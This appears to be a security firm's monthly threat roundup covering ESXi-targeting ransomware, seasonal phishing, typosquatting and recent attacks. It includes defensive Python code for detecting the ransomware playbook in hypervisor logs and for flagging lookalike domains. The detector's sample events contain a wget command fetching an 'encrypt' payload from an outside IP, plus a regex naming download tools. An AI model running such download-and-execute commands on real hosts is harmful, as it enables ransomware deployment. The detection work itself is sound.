The Integrity360 CTR team has observed an increased focus by Ransomware as a Service (RaaS) gangs on virtualisation infrastructure, particularly VMware ESXi and vCenter. The threat actor playbook is similar across incidents, but no less devastating for that, because multiple critical servers typically run on the one hypervisor.
Once initial access is achieved there is often an immediate lurch to identify this virtual infrastructure using tools such as AdFind and ADRecon. The actor then has three potential methods of logging on to the VMware servers: vulnerability exploitation, credential harvesting, or compromise of a domain admin account (if VMware is domain joined).
Once access to the VMware server is gained, a new local admin account is created with full permissions. The threat actor then resets the existing legitimate admin accounts, locking them out. With full access, the objective becomes uploading a ransomware sample to the server; this is generally done using wget.
From Integrity360’s experience, once the ransomware is executed it identifies datastores (VMware speak for where virtual machines are stored), stops all running virtual machines, deletes snapshots (backups) and finally encrypts the datastores, essentially destroying the virtual machines.
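The playbook above has four observable stages on the hypervisor itself: a new privileged local account, a run of password resets against the existing admins, a download tool invoked from the shell, and a burst of VM power-offs and snapshot removals just before encryption. The detection sketch below is an added example, not Integrity360's tooling or any VMware product; the sample events are constructed for the example and only loosely modelled on what ESXi records in its auth, shell and hostd logs, so the message formats, field names, thresholds and window sizes are all assumptions that would need to be fitted to real host logs.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample events (timestamp, source, message). These are NOT real
# ESXi log lines; they stand in for auth/shell/hostd records for the example.
SAMPLE_EVENTS = [
    ("2022-12-01T02:10:05", "auth",  "Created local account 'svc_backup' with Administrator role by 'root'"),
    ("2022-12-01T02:11:40", "auth",  "Password changed for user 'vmadmin' by 'svc_backup'"),
    ("2022-12-01T02:12:02", "auth",  "Password changed for user 'esxadmin' by 'svc_backup'"),
    ("2022-12-01T02:15:30", "shell", "[svc_backup]: wget http://203.0.113.10/encrypt -O /tmp/encrypt"),
    ("2022-12-01T02:16:01", "shell", "[svc_backup]: chmod +x /tmp/encrypt"),
    ("2022-12-01T02:17:10", "hostd", "Powered off VM 'dc01'"),
    ("2022-12-01T02:17:12", "hostd", "Powered off VM 'web01'"),
    ("2022-12-01T02:17:15", "hostd", "Powered off VM 'db01'"),
    ("2022-12-01T02:17:40", "hostd", "Removed snapshot 'nightly' from VM 'dc01'"),
    ("2022-12-01T02:17:41", "hostd", "Removed snapshot 'nightly' from VM 'web01'"),
    ("2022-12-01T02:17:43", "hostd", "Removed snapshot 'nightly' from VM 'db01'"),
    # Benign admin activity later the same day: one snapshot removed, one VM stopped.
    ("2022-12-01T14:00:00", "hostd", "Removed snapshot 'pre-patch' from VM 'web01'"),
    ("2022-12-01T14:05:00", "hostd", "Powered off VM 'test01'"),
]

# Patterns for the assumed message formats above.
ACCOUNT_CREATED = re.compile(r"Created local account '(?P<acct>[^']+)' with Administrator role")
PASSWORD_CHANGED = re.compile(r"Password changed for user '(?P<target>[^']+)' by '(?P<actor>[^']+)'")
DOWNLOAD_TOOL = re.compile(r"\b(wget|curl|scp)\b")
VM_POWEROFF = re.compile(r"Powered off VM '")
SNAPSHOT_REMOVED = re.compile(r"Removed snapshot '")

BURST_WINDOW = timedelta(minutes=5)   # assumed tuning values
BURST_THRESHOLD = 3
RESET_THRESHOLD = 2


def _burst(times, threshold, window):
    """True if at least `threshold` timestamps fall inside one sliding `window`."""
    times = sorted(times)
    start = 0
    for end, t in enumerate(times):
        while t - times[start] > window:
            start += 1
        if end - start + 1 >= threshold:
            return True
    return False


def detect(events):
    """Return (rule, detail) alerts for each playbook stage seen in `events`."""
    alerts = []
    resets_by_actor = defaultdict(set)
    poweroffs, snapshot_removals = [], []
    for ts, src, msg in events:
        ts = datetime.fromisoformat(ts)
        if src == "auth":
            m = ACCOUNT_CREATED.search(msg)
            if m:
                alerts.append(("new_local_admin", m.group("acct")))
            m = PASSWORD_CHANGED.search(msg)
            if m and m.group("actor") != m.group("target"):
                resets_by_actor[m.group("actor")].add(m.group("target"))
        elif src == "shell" and DOWNLOAD_TOOL.search(msg):
            alerts.append(("download_tool_in_shell", msg))
        elif src == "hostd":
            if VM_POWEROFF.search(msg):
                poweroffs.append(ts)
            elif SNAPSHOT_REMOVED.search(msg):
                snapshot_removals.append(ts)
    # One actor resetting several other accounts is the lock-out stage.
    for actor, targets in resets_by_actor.items():
        if len(targets) >= RESET_THRESHOLD:
            alerts.append(("mass_admin_password_reset", f"{actor} reset {sorted(targets)}"))
    # A single power-off or snapshot removal is routine; a burst is not.
    if _burst(poweroffs, BURST_THRESHOLD, BURST_WINDOW):
        alerts.append(("vm_poweroff_burst", f"{len(poweroffs)} power-offs"))
    if _burst(snapshot_removals, BURST_THRESHOLD, BURST_WINDOW):
        alerts.append(("snapshot_removal_burst", f"{len(snapshot_removals)} removals"))
    return alerts


if __name__ == "__main__":
    for rule, detail in detect(SAMPLE_EVENTS):
        print(f"{rule}: {detail}")
```

The burst rules are what separate this sequence from normal operations: an administrator removing one snapshot or stopping one VM in the afternoon produces nothing, while three of each inside a five-minute window, preceded by a fresh Administrator account and a wget from the shell, is the whole playbook in order. Forwarding hypervisor logs to a syslog collector is the precondition, since an actor with root on the host can clear local logs before encrypting.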
As we all turn our thoughts to the upcoming holiday period, so do cyber criminals. Christmas is always a time when scammers and hackers step up their activity, as they know that most people's thoughts are more focused on holidays and present buying than on security.
We have seen a sharp increase in the number of phishing emails and SMS messages claiming to be from delivery companies such as DHL and Royal Mail. Fake Christmas sales offers are also in abundance, with countless phishing emails being sent daily.
This month also saw the Cost of Living crisis come to the fore, and criminals have wasted no time in trying to exploit it. Cost of living scams, such as those seeking to take advantage of people's worries, have increased dramatically. These scams might pretend to represent energy companies, direct people to fake loan websites, or contact them regarding the government’s Energy Bills Support Scheme to trick them into giving up sensitive information.
We’ve also observed a rise in the number of typosquatting or URL hijacking attempts on domains. This is the most common method used by fraudsters to scam individual users, directing them to fake sites for delivery companies or for resetting passwords to online subscription services. For businesses, it can also relate to attempts to monitor and redirect internal users' emails in order to facilitate Business Email Compromise (BEC) scams.
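Typosquatting and URL hijacking work because a registered lookalike domain is only one keystroke, one swapped letter or one confusable character away from the brand it imitates. The checker below is an added example, not Integrity360's monitoring service or any named library, showing how newly observed domains (from certificate transparency feeds, DNS logs or mail headers) can be scored against a list of brands you care about. The monitored list, the confusable map and the distance thresholds are assumptions; in particular it takes the label before the last dot as the registrable name, which is wrong for suffixes such as .co.uk, where a public suffix list should be used instead.

```python
import unicodedata

# Constructed list of domains to protect; replace with your own brands.
MONITORED = ["integrity360.com", "royalmail.com", "dhl.com"]

# Single Cyrillic letters that render identically to Latin ones (assumed subset).
HOMOGLYPHS = {"\u0430": "a", "\u0435": "e", "\u043e": "o", "\u0440": "p", "\u0441": "c"}

# ASCII sequences that read as another letter in many fonts (assumed subset).
CONFUSABLES = {"vv": "w", "rn": "m", "0": "o", "1": "l", "|": "l"}


def normalize(label):
    """Fold homoglyphs, accents and confusable sequences to a plain ASCII form."""
    s = "".join(HOMOGLYPHS.get(ch, ch) for ch in label.lower())
    s = unicodedata.normalize("NFKD", s).encode("ascii", "ignore").decode()
    for bad, good in CONFUSABLES.items():
        s = s.replace(bad, good)
    return s


def osa_distance(a, b):
    """Optimal string alignment distance: edits plus adjacent transpositions."""
    d = [[0] * (len(b) + 1) for _ in range(len(a) + 1)]
    for i in range(len(a) + 1):
        d[i][0] = i
    for j in range(len(b) + 1):
        d[0][j] = j
    for i in range(1, len(a) + 1):
        for j in range(1, len(b) + 1):
            cost = 0 if a[i - 1] == b[j - 1] else 1
            d[i][j] = min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost)
            if i > 1 and j > 1 and a[i - 1] == b[j - 2] and a[i - 2] == b[j - 1]:
                d[i][j] = min(d[i][j], d[i - 2][j - 2] + 1)
    return d[-1][-1]


def _second_level(domain):
    # Crude: the label before the last dot. Use a public suffix list in production.
    return domain.split(".")[-2] if "." in domain else domain


def classify(candidate, monitored=MONITORED, max_distance=1):
    """Return (verdict, matched_brand) for a domain seen in logs or CT feeds."""
    candidate = candidate.lower().strip(".")
    if candidate in monitored:
        return ("legitimate", candidate)
    label = normalize(_second_level(candidate))
    checks = [
        ("homoglyph", lambda l, t: l == t),             # same after folding
        ("brand_embedded", lambda l, t: t in l),        # e.g. brand-tracking
        # Edit distance only for longer brands; 3-letter names would match everything.
        ("typo", lambda l, t: len(t) >= 6 and osa_distance(l, t) <= max_distance),
    ]
    for verdict, matches in checks:
        for target in monitored:
            if matches(label, normalize(_second_level(target))):
                return (verdict, target)
    return ("unrelated", None)


if __name__ == "__main__":
    for d in ["royalmail.com", "r0yalmail.com", "royalmial.com",
              "royalmail-tracking.com", "r\u043eyalmail.com", "example.com"]:
        print(d, classify(d))
```

Three checks run in a fixed order so the most specific verdict wins: an exact match after folding is a homoglyph, the brand appearing inside a longer label is brand embedding, and anything within one edit or transposition of a brand at least six characters long is a typo. Short brands such as the three-letter DHL label are deliberately excluded from the distance check, because almost any three-letter label sits within one edit of them; those are caught only by the homoglyph and embedding rules.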
The devastating impacts of ransomware made the headlines this month after the island state of Vanuatu was hit by an attack that disabled the websites of the parliament, police and other government agencies as well as impacting the email systems and intranet of the country’s hospitals, schools and emergency services.
According to reports, suspicious phishing activity was detected in emails to the Ministry of Finance. Once the malware was triggered, almost all government websites and email archives were taken down, and with many departments storing their data on local computer drives rather than on separate servers or in the cloud, the impact was magnified. The country continues to struggle with the aftermath of the attack almost a month later.
No official information has been released on whether ransom demands were made by the hackers.
In the wake of recent cyber attacks against the European Parliament and institutions across the EU, the Council has adopted legislation for a new high common level of cybersecurity across member countries.
The new NIS2 directive will replace the current NIS directive and is designed to increase resilience and incident response capabilities across the EU.
Read more about the new controls HERE
The US Cybersecurity and Infrastructure Security Agency (CISA) reported that Iranian advanced persistent threat (APT) actors had compromised a US federal network by exploiting the Log4Shell vulnerability in an unpatched VMware Horizon server.
Access to the federal network had been used to facilitate the deployment of XMR cryptocurrency mining software, with persistence enabled by moving laterally to domain controllers, compromising credentials, and implanting Ngrok reverse proxies on hosts.
With the World Cup well under way the expected increase in phishing scams and fake domains has not disappointed.
According to new security research, over 16,000 scam domains are active, and up to 40 malicious apps designed to trick users out of their sensitive information were discovered in the Google Play store.
If you are worried about any of the threats outlined in this bulletin or need help in determining what steps you should take to protect yourself from the most material threats facing your organisation, please contact your account manager, or alternatively email us at TBD@integrity360.com for a complimentary, no-commitments consultation. Also feel free to explore the many cyber security resources available on our website at https://www.integrity360.com/resources
The Threat Intel Roundup was prepared by Integrity360 summarising threat news as we observe it, current at the date of publishing. It should not be considered to be legal, consulting or any other professional advice. Any recommendations should be considered in the context of your own organisation. Integrity360 does not take any political stance in the information that we share. Moreover, the opinions expressed may not necessarily be the views of Integrity360.
If you’d like more detailed threat intelligence news, Integrity360 offers this as part of our security monitoring managed services.
We also offer a tailored threat intelligence monitoring service for your organisation that actively monitors for threat actors and campaigns of direct relevance to your organisation, brand damage, copycat & spoofed domains, credential leakage and dark web monitoring.